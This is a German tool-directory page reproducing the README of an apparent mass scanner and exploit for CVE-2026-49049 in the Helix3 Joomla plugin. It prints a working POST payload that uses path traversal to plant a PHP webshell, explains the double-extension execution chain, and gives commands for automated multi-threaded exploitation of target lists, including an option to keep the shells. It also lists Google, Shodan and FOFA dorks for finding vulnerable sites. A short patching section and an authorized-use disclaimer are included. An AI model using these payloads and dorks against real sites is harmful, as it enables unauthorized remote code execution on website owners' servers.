Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-49049 — CVE-2026-49049 Helix3 (JoomShaper) Joomla Nicht authentifizierter AJAX RCE Scanner | Kitploit
Tools/GitHubGitHub/exdev994/cve-2026-49049
AufklärungSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubexdev994/cve-2026-49049

CVE-2026-49049

CVE-2026-49049 Helix3 (JoomShaper) Joomla Nicht authentifizierter AJAX RCE Scanner

Repository anzeigen
17vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-49049 — Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner

CVE CVSS Python License Author

Massenscanner/Verifizierer für CVE-2026-49049: nicht authentifizierter AJAX-Handler im Helix3 Framework-Plugin für Joomla (v1.0 – 3.1.0, gepatcht in 3.1.1+).

Nur autorisierte Tests. Verwenden Sie dies nur auf Systemen, die Ihnen gehören oder für die Sie eine schriftliche Erlaubnis zum Testen haben.


Inhaltsverzeichnis

  • Übersicht der Schwachstelle
  • RCE-Kette
  • Installation
  • Verwendung (Usage)
  • Beispielausgabe
  • Aufklärungs-Dorks
  • Behebung (Remediation)
  • Projektstruktur
  • Mitwirken
  • Referenzen
  • Haftungsausschluss

Übersicht der Schwachstelle

Handler onAjaxHelix3() in plugins/ajax/helix3/helix3.php ist über Joomla com_ajax ohne Authentifizierung / CSRF-Token erreichbar:

POST /index.php?option=com_ajax&plugin=helix3&format=json
Content-Type: application/x-www-form-urlencoded

data[action]=save&data[layoutName]=../../up.php&data[content]=<?php system($_GET['cmd']); ?>
AktionAuswirkungVersionen
saveBeliebiges JSON-Datei-Schreiben + Pfad-Traversal1.0 – 3.1.0
removeBeliebiges Löschen von Dateien (keine Erweiterungs-/Pfad-Einschränkung)1.0 – 3.1.0
importÜberschreiben von Template-Parametern in der DB (custom_js unescaped → XSS/Defacement)nur v3.x
Helix3 Versionsave / removeimportStatus
1.0 – 2.xAnfälligNicht vorhandenAnfällig
3.0 – 3.1.0AnfälligAnfälligAnfällig
3.1.1+GepatchtGepatchtSicher

RCE-Kette

Aktive Massenausnutzung in freier Wildbahn setzt oft eine Doppel-Extension-Webshell ab:

  1. Helix3 erkennen + Version < 3.1.1
  2. save mit layoutName=../../up.php + PHP-Webshell-Inhalt
  3. Save hängt .json an → up.php.json landet im Web-Root
  4. Apache AddHandler Multi-Extension führt den .php-Token aus
  5. GET /up.php.json?cmd=id → uid=33(www-data) = SHELL OK
Helix3 erkennen
    → POST com_ajax?plugin=helix3 (action=save, traversal)
    → up.php.json geschrieben
    → GET up.php.json?cmd=id
    → uid=33(www-data)

Installation

git clone https://github.com/ExDev994/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

Anforderungen: requests>=2.31.0, colorama>=0.4.6, Python 3.9+.


Verwendung (Usage)

1. Ziel vorbereiten

Bearbeiten Sie targets.txt — eine URL / Host pro Zeile (# = Kommentar). Der Joomla-Pfad bleibt erhalten:

# beispiel
https://example.com/
https://example.com/joomla/
http://192.168.1.50/

2. Nur-Lese-Scan (nur Erkennung)

Es wird keine Webshell abgelegt. Prüft Version + testet save / remove / import:

python3 scan.py -f targets.txt --scan -o results.txt

3. Auto: Erkennen + Webshell ablegen + RCE verifizieren

python3 scan.py -f targets.txt --auto -c "id" -o results.txt

4. Einzelnes Ziel

python3 scan.py -t https://ziel.tld/joomla/ --auto -c "id"

5. Erweiterte Optionen

# Webshell nach Verifikation behalten (demo autorisiert)
python3 scan.py -f targets.txt --auto --keep

# Benutzerdefinierter Webshell-Name + Traversal-Tiefen
python3 scan.py -f targets.txt --auto \
  --webshell-name up.php \
  --traversal-depths "../../,../../../"

# JSON-Bericht + Parallelität
python3 scan.py -f targets.txt --auto -c "whoami" \
  --threads 20 --timeout 15 \
  -o results.txt --json report.json

# Proxy (Burp / etc.)
python3 scan.py -t https://ziel.tld/ --scan --proxy http://127.0.0.1:8080

Wichtige Flags

FlagBeschreibung
-f / --fileDatei mit Zielliste (Standard: targets.txt wenn -t fehlt)
-t / --targetEinzelne Ziel-URL
--scanNur-Lese-Erkennung
--autoErkennung + RCE-Verifikation (Standard)
-c / --cmdBefehl zur Verifikation (Standard: id)
-o / --outputErgebnisdatei — nur Ziele mit VULN / SHELL_OK
--jsonStrukturierter JSON-Bericht
--keepWebshell nach Verifikation nicht automatisch entfernen
--threadsGleichzeitige Worker (Standard: 15)
--timeoutHTTP-Timeout in Sekunden (Standard: 15)

Warnung: Der Modus --auto versucht, eine Webshell per Pfad-Traversal zu schreiben. Standard: Webshell wird nach Verifikation entfernt. Verwenden Sie --keep nur für autorisierte Demos.


Beispielausgabe

Terminal zeigt alle Status (Fortschritt). results.txt enthält nur anfällige Ziele:

[v] CVE-2026-49049 SHELL OK  https://ziel.tld  Helix3 2.5.6  save=Y remove=Y import=N
[id] -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    shell: https://ziel.tld/up.php.json?cmd=id
[ ] VULN (keine Shell)         https://ziel.tld  Helix3 3.0.2  save=Y remove=Y import=Y

Andere Labels (PATCHED, NOT_HELIX3, TIMEOUT, UNKNOWN) erscheinen nur im Terminal, nicht in results.txt.


Aufklärungs-Dorks

Verwenden Sie die folgenden Dorks, um potenziell betroffene Helix3-/Joomla-Assets zu finden. Scannen Sie nur autorisierte Ziele.

Google

inurl:templates/shaper_helix3/templateDetails.xml
inurl:"templates/shaper_helix3"
"shaper_helix3" "Joomla"
inurl:index.php?option=com_ajax "helix3"
"powered by Helix" Joomla
intitle:"Home" "shaper_helix3"
inurl:/templates/helix3/

Shodan

http.html:"shaper_helix3"
http.html:"Helix3" http.html:"Joomla"
http.title:"Joomla" "shaper_helix3"
http.html:"/templates/shaper_helix3/"
http.html:"joomshaper" product:"Joomla"
html:"plg_system_helix3"

FOFA

body="shaper_helix3"
body="/templates/shaper_helix3/" && body="Joomla"
body="Helix3" && body="joomshaper"
body="plg_ajax_helix3" || body="onAjaxHelix3"
title="Joomla" && body="shaper_helix3"
body="templateDetails.xml" && body="helix3"

Manueller Fingerabdruck (nach Erhalt des Hosts)

# Versionsprüfung
curl -sk 'https://ZIEL/templates/shaper_helix3/templateDetails.xml' | grep -i version

# Unauth-save-Test (nur autorisiert)
curl -sk -X POST \
  'https://ZIEL/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

Behebung (Remediation)

1. Sofort patchen (zwingend erforderlich)

Aktualisieren Sie System – Helix3 Framework und Helix3 – Ajax-Plugin auf 3.1.1 oder neuer (empfohlen 3.1.2).

  • Joomla-Backend → System → Update / Extensions
  • Oder laden Sie das offizielle Paket von JoomShaper herunter und installieren Sie es manuell

2. Bei bereits erfolgter Kompromittierung / Defacement

Das Update bereinigt nicht die bereits in der Datenbank befindlichen Payloads.

Tool herunterladen